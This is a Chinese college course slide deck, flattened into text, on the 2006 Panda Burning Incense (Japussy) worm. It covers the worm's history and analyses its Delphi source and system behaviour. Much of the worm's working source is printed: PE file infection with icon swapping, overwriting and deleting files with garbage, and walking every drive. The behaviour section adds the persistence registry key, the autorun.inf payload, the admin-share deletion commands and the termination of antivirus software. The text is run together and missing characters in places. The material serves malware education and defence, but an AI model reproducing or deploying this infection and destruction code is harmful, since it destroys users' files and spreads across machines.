3-4-2熊貓燒香病毒剖析

1、計算機病毒與防治重慶電子工程職業(yè)學院計算機病毒與防治課程小組教學單元4-4 蠕蟲病毒防治 熊貓燒香病毒源碼分析 熊貓燒香病毒特點 熊貓燒香病毒行為分析第二講 熊貓燒香蠕蟲病毒剖析計算機病毒與防治課程小組 熊貓燒香病毒的手工去除熊貓燒香病毒特點計算機病毒與防治課程小組病毒名稱 熊貓燒香 又稱 尼姆亞、武漢男生、worm.whBoy.、worm.nimaya. 病毒類型 蠕蟲病毒危險級別 影響系統(tǒng) Win 9X/ME/NT/2000/XP/2003熊貓燒香病毒特點計算機病毒與防治課程小組2006年底，我國互聯(lián)網(wǎng)上大規(guī)模爆發(fā)“熊貓燒香病毒及其變種，該病毒通過多種方式進行傳播，同時該病毒還具有盜取用戶

2、游戲賬號、賬號等功能。該病毒傳播速度快，危害范圍廣，截至案發(fā)為止，已有上百萬個人用戶、網(wǎng)吧及企業(yè)局域網(wǎng)用戶遭受感染和破壞，引起社會各界高度關(guān)注。 ?瑞星2006平安報告?將其列為十大病毒之首，在?2006年度中國大陸地區(qū)電腦病毒疫情和互聯(lián)網(wǎng)平安報告?的十大病毒排行中一舉成為“毒王。熊貓燒香病毒特點計算機病毒與防治課程小組熊貓燒香一個感染型的蠕蟲病毒，它能感染系統(tǒng)中exe，com，pif，src，html，asp等文件，它還能中止大量的反病毒軟件進程并且會刪除擴展名為gho的文件，該文件是一系統(tǒng)備份工具GHOST的備份文件，使用戶的系統(tǒng)備份文件喪失。 被感染的用戶系統(tǒng)中所有.exe可執(zhí)行文件全部

3、被改成熊貓舉著三根香的模樣。熊貓燒香病毒特點計算機病毒與防治課程小組湖北省公安廳2007年2月12日宣布，根據(jù)統(tǒng)一部署，湖北省網(wǎng)監(jiān)在多個省市公安機關(guān)的配合下，一舉偵破了制作傳播“熊貓燒香病毒案，抓獲李俊男，歲，武漢新洲區(qū)人。病毒制造者熊貓燒香病毒源碼分析計算機病毒與防治課程小組含有病毒體的文件被運行后，病毒將自身拷貝至系統(tǒng)目錄，同時修改注冊表將自身設(shè)置為開機啟動項，并遍歷各個驅(qū)動器，將自身寫入磁盤根目錄下，增加一個Autorun.inf文件，使得用戶翻開該盤時激活病毒體。隨后病毒體開一個線程進行本地文件感染，同時開另外一個線程連接網(wǎng)站下載ddos程序進行發(fā)動惡意攻擊。病毒結(jié)構(gòu) 主程序流程圖熊貓

4、燒香病毒源碼分析計算機病毒與防治課程小組Program japussy;useswindows,sysutils,classes,graphics,shellapi,registry;constheadersize=82432;/病毒體的大小iconoffset=$12eb8;/pe文件主圖標的偏移量/查找2800000020的十六進制字符串可以找到主圖標的偏移量headersize=38912;/upx壓縮過病毒體的大小iconoffset=$92bc;/upx壓縮過pe文件主圖標的偏移量iconsize=$2e8;/pe文件主圖標的大小-744字節(jié)icontail=iconoffset+i

5、consize;/pe文件主圖標的尾部id=$44444444;/感染標記病毒文件初始信息熊貓燒香病毒源碼分析計算機病毒與防治課程小組/垃圾碼，以備寫入catchword=ifaraceneedtobekilledout,itmustbeyamato.+ifacountryneedtobedestroyed,itmustbejapan!+*w32.japussy.worm.a*;$r*.resfunctionregisterserviceprocess(dwprocessid,dwtype:integer):integer;stdcall;externalkernel32.dll; /函數(shù)聲明

6、vartmpfile:string;si:startupinfo;pi:process_information;isjap:boolean=false; /日文操作系統(tǒng)標記熊貓燒香病毒源碼分析計算機病毒與防治課程小組=判斷是否為win9x=functioniswin9x:boolean;varver:tosversioninfo;beginresult:=false;ver.dwosversioninfosize:=sizeof(tosversioninfo);ifnotgetversionex(ver)thenexit;if(ver.dwplatformid=ver_platform_win

7、32_windows)then/win9xresult:=true;end;熊貓燒香病毒源碼分析計算機病毒與防治課程小組=在流之間復制=procedurecopystream(src:tstream;sstartpos:integer;dst:tstream;dstartpos:integer;count:integer);varscurpos,dcurpos:integer;beginscurpos:=src.position;dcurpos:=dst.position;src.seek(sstartpos,0);dst.seek(dstartpos,0);dst.copyfrom(src,

8、count);src.seek(scurpos,0);dst.seek(dcurpos,0);end;熊貓燒香病毒源碼分析計算機病毒與防治課程小組=將宿主文件從已感染的PE文件中別離出來，以備使用=procedureextractfile(filename:string);varsstream,dstream:tfilestream;begin try sstream:=tfilestream.create(paramstr(0),fmopenreadorfmsharedenynone); try dstream:=tfilestream.create(filename,fmcreate);

9、try sstream.seek(headersize,0); /跳過頭部的病毒局部 dstream.copyfrom(sstream,sstream.size-headersize); finally dstream.free; end;finallysstream.free;end;熊貓燒香病毒源碼分析計算機病毒與防治課程小組=填充startupinfo結(jié)構(gòu)=procedurefillstartupinfo(varsi:startupinfo;state:word);beginsi.cb:=sizeof(si);si.lpreserved:=nil;si.lpdesktop:=nil;si

10、.lptitle:=nil;si.dwflags:=startf_useshowwindow;si.wshowwindow:=state;si.cbreserved2:=0;si.lpreserved2:=nil;end;=發(fā)帶毒郵件=proceduresendmail; /此處省略了帶危害性的代碼beginend;熊貓燒香病毒源碼分析計算機病毒與防治課程小組=感染PE文件=procedureinfectonefile(filename:string);varhdrstream,srcstream:tfilestream;icostream,dststream:tmemorystream;ii

11、d:longint;aicon:ticon;infected,ispe:boolean;i:integer;buf:array0.1ofchar;begintry /出錯那么文件正在被使用，退出ifcomparetext(filename,japussy.exe)=0then /是自己那么不感染exit;infected:=false;ispe:=false;熊貓燒香病毒源碼分析計算機病毒與防治課程小組srcstream:=tfilestream.create(filename,fmopenread);tryfori:=0to$108do /檢查pe文件頭beginsrcstream.seek

12、(i,sofrombeginning);srcstream.read(buf,2);if(buf0=#80)and(buf1=#69)then /pe標記beginispe:=true; /是pe文件break;end;end;srcstream.seek(-4,sofromend); /檢查感染標記srcstream.read(iid,4);if(iid=id)or(srcstream.size10240)then /太小的文件不感染infected:=true;finallysrcstream.free;end;熊貓燒香病毒源碼分析計算機病毒與防治課程小組ifinfectedor(noti

13、spe)then /如果感染過了或不是pe文件那么退出exit;icostream:=tmemorystream.create;dststream:=tmemorystream.create;tryaicon:=ticon.create;try/得到被感染文件的主圖標(744字節(jié))，存入流aicon.releasehandle;aicon.handle:=extracticon(hinstance,pchar(filename),0);aicon.savetostream(icostream);finallyaicon.free;end;熊貓燒香病毒源碼分析計算機病毒與防治課程小組srcstr

14、eam:=tfilestream.create(filename,fmopenread);/頭文件hdrstream:=tfilestream.create(paramstr(0),fmopenreadorfmsharedenynone);try/寫入病毒體主圖標之前的數(shù)據(jù)copystream(hdrstream,0,dststream,0,iconoffset);/寫入目前程序的主圖標copystream(icostream,22,dststream,iconoffset,iconsize);/寫入病毒體主圖標到病毒體尾部之間的數(shù)據(jù)copystream(hdrstream,icontail,

15、dststream,icontail,headersize-icontail);/寫入宿主程序copystream(srcstream,0,dststream,headersize,srcstream.size);/寫入已感染的標記dststream.seek(0,2);iid:=$44444444;dststream.write(iid,4);finally熊貓燒香病毒源碼分析計算機病毒與防治課程小組=將目標文件寫入垃圾碼后刪除=proceduresmashfile(filename:string);varfilehandle:integer;i,size,mass,max,len:inte

16、ger;Begintrysetfileattributes(pchar(filename),0); /去掉只讀屬性filehandle:=fileopen(filename,fmopenwrite); /翻開文件trysize:=getfilesize(filehandle,nil); /文件大小i:=0;randomize;max:=random(15); /寫入垃圾碼的隨機次數(shù)ifmax5thenmax:=5;熊貓燒香病毒源碼分析計算機病毒與防治課程小組mass:=sizedivmax; /每個間隔塊的大小len:=length(catchword);whileimaxdobeginfil

17、eseek(filehandle,i*mass,0); /定位/寫入垃圾碼，將文件徹底破壞掉filewrite(filehandle,catchword,len);inc(i);end;finallyfileclose(filehandle); /關(guān)閉文件end;/刪除之deletefile(pchar(filename);熊貓燒香病毒源碼分析計算機病毒與防治課程小組=獲得可寫的驅(qū)動器列表=functiongetdrives:string;vardisktype:word;d:char;str:string;i:integer;beginfori:=0to25do/遍歷26個字母begind:

18、=chr(i+65);str:=d+:;disktype:=getdrivetype(pchar(str);/得到本地磁盤和網(wǎng)絡(luò)盤if(disktype=drive_fixed)or(disktype=drive_remote)thenresult:=result+d;end;熊貓燒香病毒源碼分析計算機病毒與防治課程小組=遍歷目錄，感染和摧毀文件=procedureloopfiles(path,mask:string);vari,count:integer;fn,ext:string;subdir:tstrings;searchrec:tsearchrec;msg:tmsg;functioni

19、svaliddir(searchrec:tsearchrec):integer;beginif(searchrec.attr16)and(.)and(.)thenresult:=0 /不是目錄elseif(searchrec.attr=16)and(.)and(.)thenresult:=1 /不是根目錄elseresult:=2; /是根目錄end;熊貓燒香病毒源碼分析計算機病毒與防治課程小組beginif(findfirst(path+mask,faanyfile,searchr

20、ec)=0)thenbeginrepeat peekmessage(msg,0,0,0,pm_remove); /調(diào)整消息隊列，防止引起疑心ifisvaliddir(searchrec)=0thenbeginfn:=path+;ext:=uppercase(extractfileext(fn);if(ext=.exe)or(ext=.scr)thenbegin infectonefile(fn); /感染可執(zhí)行文件endelseif(ext=.htm)or(ext=.html)or(ext=.asp)thenbegin/感染html和asp文件，將base64編碼后

21、的病毒寫入/感染瀏覽此網(wǎng)頁的所有用戶end熊貓燒香病毒源碼分析計算機病毒與防治課程小組elseifext=.wabthen /outlook地址簿文件begin/獲取outlook郵件地址endelseifext=.adcthen /foxmail地址自動完成文件begin/獲取foxmail郵件地址endelseifext=indthen /foxmail地址簿文件begin/獲取foxmail郵件地址子過程是典型的遍歷本機中所有可用盤中的所有子目錄下的所有文件并施行相應(yīng)操作的編碼。在確定當前文件為可執(zhí)行文件僅針對.EXE和.SCR文件后，調(diào)用子過程InfectOneFile進行特定的感染。

22、熊貓燒香病毒源碼分析計算機病毒與防治課程小組=遍歷磁盤上所有的文件=procedureinfectfiles;vardriverlist:string;i,len:integer;beginifgetacp=932then /日文操作系統(tǒng)isjap:=true; driverlist:=getdrives; /得到可寫的磁盤列表len:=length(driverlist);whiletruedo /死循環(huán)beginfori:=lendownto1do /遍歷每個磁盤驅(qū)動器loopfiles(driverlist+:,*.*);/感染之sendmail; /發(fā)帶毒郵件sleep(1000*60

23、*5); /睡眠5分鐘熊貓燒香病毒源碼分析計算機病毒與防治課程小組這里的核心是后面的死循環(huán)。先讓我們分析較簡單的“發(fā)帶毒郵件局部。從后面病毒具體遍歷可用磁盤并執(zhí)行具體感染過程可知，此過程中，它會取得安裝在本機中的常用郵件客戶端程序Outlook，F(xiàn)oxMail相應(yīng)電子郵件信息。其目的是：取得重要郵箱地址及相應(yīng)密碼，然后向這些郵件地址群發(fā)帶毒的電子郵件，從而到達利用網(wǎng)絡(luò)傳播自身的目的。熊貓燒香病毒源碼分析計算機病毒與防治課程小組=主程序開始=beginifiswin9xthen/是win9xregisterserviceprocess(getcurrentprocessid,1)/注冊為效勞進程

24、else/winntbegin/遠程線程映射到explorer進程end;雖然源碼提供者省略了相應(yīng)實現(xiàn)，但這是比較根本的編程實現(xiàn)。通過把自身注冊為效勞進程，可以使自己隨著系統(tǒng)的啟動一起啟動。當然，還可以進一步施加技巧而使自己從Windows任務(wù)管理器下隱藏顯示。熊貓燒香病毒源碼分析計算機病毒與防治課程小組/如果是原始病毒體自己ifcomparetext(extractfilename(paramstr(0),japussy.exe)=0theninfectfiles /感染和發(fā)郵件else /已寄生于宿主程序上了，開始工作begintmpfile:=paramstr(0); /創(chuàng)立臨時文件de

25、lete(tmpfile,length(tmpfile)-4,4);tmpfile:=tmpfile+#32+.exe; /真正的宿主文件，多一個空格extractfile(tmpfile); /別離之fillstartupinfo(si,sw_showdefault);createprocess(pchar(tmpfile),pchar(tmpfile),nil,nil,true,0,nil,.,si,pi); /創(chuàng)立新進程運行之infectfiles; /感染和發(fā)郵件end;熊貓燒香病毒主要行為分析計算機病毒與防治課程小組熊貓燒香病毒樣本 熊貓燒香病毒感染D盤中的文件熊貓燒香病毒主要行為分

26、析計算機病毒與防治課程小組熊貓燒香病毒主要行為分析計算機病毒與防治課程小組2復制自身到系統(tǒng)目錄下：C:WINDOWSSystem32Driversspoclsv.exe。 熊貓燒香病毒在系統(tǒng)盤下生成的文件熊貓燒香病毒主要行為分析計算機病毒與防治課程小組3創(chuàng)立啟動項：HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunsvcshare=%System%driversspoclsv.exe 熊貓燒香在注冊表中添加啟動項熊貓燒香病毒主要行為分析計算機病毒與防治課程小組4在各分區(qū)根目錄生成病毒副本：X:setup.exeX:autorun

27、.inf其中autorun.inf中的內(nèi)容是：AutoRunOPEN=setup.exeshellexecute=setup.exeshellAutocommand=setup.exe熊貓燒香病毒主要行為分析計算機病毒與防治課程小組5使用net share命令關(guān)閉管理共享：cmd.exe /c net share X$ /del /y cmd.exe /c net share admin$ /del /y6修改“顯示所有文件和文件夾設(shè)置：HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue=dword:000000007嘗試關(guān)閉平安軟件相關(guān)窗口：天網(wǎng)防火墻進程、VirusScan 、NOD32等 8嘗試結(jié)束平安軟件相關(guān)進程：Mcshield.exe VsTskMgr.exe等 熊貓燒香病毒主要行為分析計算機病毒與防治課程小組9禁用平安軟件相關(guān)效勞：Schedule sharedaccess Rs